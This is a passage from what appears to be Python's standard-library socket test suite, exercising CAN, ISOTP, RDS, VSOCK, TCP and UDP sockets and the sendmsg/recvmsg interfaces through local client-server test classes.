socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
